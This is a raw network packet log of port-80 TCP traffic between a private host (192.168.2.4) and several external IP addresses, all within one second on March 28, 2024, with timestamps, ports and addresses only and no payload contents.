Mar 28, 2024 09:14:59.188760996 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.188800097 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.188800097 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.188808918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.188838959 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.188879013 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.188879013 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.188954115 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.188994884 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.189668894 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.189682007 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.189752102 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.189758062 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.189764023 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.189774990 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.189822912 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.189824104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.189824104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.189834118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.189879894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.189879894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.190568924 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.190581083 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.190622091 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.190623045 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.190634012 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.190680981 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.190692902 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.190705061 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.190726995 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.190727949 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.190747023 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.190752029 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.190774918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.190808058 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.190808058 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.191438913 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.191452980 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.191498041 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.191520929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.191533089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.191534042 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.191574097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.191586971 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.191598892 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.191606998 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.191654921 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.191656113 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.192226887 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.192303896 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.192307949 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.192320108 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.192343950 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.192373037 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.192384958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.192406893 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.192439079 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.192439079 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.192488909 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.192526102 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.192548037 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.192683935 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.193141937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.193154097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.193197966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.193238974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.193250895 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.193272114 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.193308115 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.193308115 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.193351984 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.193419933 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.193456888 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.193456888 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.194246054 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.194258928 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.194269896 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.194283009 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.194295883 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.194345951 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.194345951 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.194351912 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.194364071 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.194408894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.194408894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.202158928 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202181101 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202193975 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202205896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202213049 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202238083 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202260971 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202286005 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202297926 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202311039 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202322006 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202337027 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202373028 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202404976 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202455044 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202491045 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202496052 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202503920 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202527046 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202542067 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202544928 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202579021 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202579021 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202646017 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202685118 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202709913 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202723026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202755928 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202766895 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202811003 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202811956 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202836037 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202883005 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.202891111 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202972889 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.202985048 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203007936 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203028917 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203064919 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203078032 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203099966 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203114986 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203146935 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203203917 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203216076 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203237057 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203272104 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203274965 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203288078 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203319073 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203327894 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203361034 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203385115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203442097 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203489065 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203505993 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203519106 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203543901 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203555107 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203558922 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203588009 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203593969 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203617096 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203627110 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203648090 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203672886 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203685999 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203704119 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203720093 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.203742981 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.203999996 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.205308914 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.205368996 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.205410004 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.205456972 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.209959030 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.209980965 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.210057020 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.223846912 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.223869085 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.223926067 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.223944902 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.237664938 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.237715960 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.237766027 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.246872902 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.246895075 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.246908903 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.246922016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.246934891 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.246948004 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247006893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247006893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247093916 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247203112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247237921 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247237921 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247248888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247261047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247272015 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247297049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247297049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247379065 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247670889 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247721910 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247734070 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247756958 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247756958 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247764111 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247776031 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247806072 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247806072 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247809887 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247833014 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.247873068 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.247873068 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.248650074 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.248667955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.248680115 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.248691082 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.248698950 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.248744011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.248744011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.249313116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.249353886 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.249366999 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.249377012 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.249417067 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.249428988 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.249456882 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.249469995 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.249481916 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.249481916 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.249492884 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.249520063 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.249556065 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.251379013 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.251393080 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.251427889 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.251465082 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.264107943 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.264131069 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.264224052 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.264247894 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.264261007 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.264301062 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.264305115 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.264317989 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.264329910 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.264349937 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.264349937 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.264370918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.264384031 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.264404058 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.264404058 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.264658928 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.265150070 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.265167952 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.265189886 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.265249014 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.265249014 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.265285969 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.265297890 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.265310049 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.265321970 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.265335083 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.265338898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.265368938 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.265387058 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.265410900 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.265417099 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.266592979 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266613960 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266659975 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266674042 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266694069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.266694069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.266750097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266772985 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266788006 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.266788006 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.266833067 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266855001 CET	80	49751	176.113.115.135	192.168.2.4
Mar 28, 2024 09:14:59.266866922 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266870975 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.266870975 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.266920090 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266932011 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266943932 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266956091 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.266956091 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.266962051 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.266978025 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.267003059 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.267014980 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.267036915 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.267036915 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.267088890 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.268004894 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.268023968 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.268037081 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.268050909 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.268088102 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.268088102 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.268130064 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.268142939 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.268163919 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.268178940 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.268251896 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.269315004 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269388914 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269392967 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.269402981 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269453049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.269464016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269500971 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269517899 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.269550085 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.269561052 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269602060 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269635916 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.269635916 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.269824028 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269890070 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269901991 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269931078 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.269970894 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.269973993 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.269984007 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270057917 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.270162106 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270174980 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270224094 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.270224094 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.270601034 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270616055 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270627022 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270662069 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270673037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270689011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.270689011 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.270720005 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.270734072 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270745993 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.270864964 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.271624088 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.271646023 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.271657944 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.271708012 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.271708012 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.271712065 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.271723986 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.271747112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.271758080 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.271779060 CET	49743	80	192.168.2.4	104.21.22.54
